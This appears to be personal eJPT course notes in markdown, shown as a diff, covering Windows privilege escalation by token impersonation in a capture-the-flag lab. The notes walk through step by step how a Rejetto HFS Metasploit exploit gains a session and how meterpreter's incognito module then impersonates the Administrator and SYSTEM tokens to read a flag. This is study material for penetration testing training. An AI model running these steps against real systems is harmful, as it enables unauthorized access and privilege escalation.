noelenz/eJPT-Course-Notes/Host & Network Penetration Testing /System & Host Based Attacks /Windows /Windows Privilege Escalation.md

   - SeCreateToken: Allows a user to create an arbitrary token with administrative privileges.
   - SemlpersonatePrivilege: Allows a user to create a process under the security context of another user typically with administrative privileges.

+ In oder to perform access token impersonation, we are going to utilizing a meterpreter session on the target and we are utilizing a inbuilt meterpreter module "incognito"

+## THe Incognito Module

+- Incognito is a built in meterpreter module that was originally a standalone application that allows you to impersonate user tokens after successful exploitation.
+- We can use the incognito module to display a list of available tokens that we can impersonate.

+## Demo

+`nmap [target IP]`
+Port 80 is open. we paste the target IP into the webbrowser.
+We see the Rejetto http fileserver running.
+`service postgresql start && msfconsole`
+`search rejetto`
+`use module 0`
+`show options`
+eventually we have to set up our own IP as LHOST and a port at LPORT `set rhosts [target IP]`
+`exploit`
+meterpreter: `sysinfo`
+meterpreter: `pgrep explorer`
+meterpeter: `migrate 3512`: We cant migrate because we have access to an unprivileged user account
+meterpreter: `getuid`
+meterpreter `getprivs`
+meterpreter: `load incognito`
+meterpreter: `exploit`
+meterpreter: `load incognito`

+meterpreter: `list_tokens`
+meterpreter: `impersonate_token "ATTACKDEFENSE\Administrator"`
+meterpreter: `getuid`
+meterpreter: `getprivs`
+meterpreter: `pgrep explorer`
+meterpreter: `migrate 3512`
+meterpreter: `getprivs`: we have elevated session. privileged user
+meterpreter: `getuid`
+generates NT authority system access token, which we then can impersonate and obtain the privileges associated with the nT authority system access token.
+In case of admin user privileges assocsiated with admin user

+impersonate token:
+meterpreter: `impersonate_token "NT AUTHORITY\SYSTEM"`
+meterpreter: `getuid`
+meterpreter: `getprivs`

+How to get the flag:
+Step 8: We can notice that the Administrator user token is available.
+Impersonate the Administrator user token and read the flag.

+Command:
+impersonate_token ATTACKDEFENSE\\Administrator
+getuid
+cat C:\\Users\\Administrator\\Desktop\\flag.txt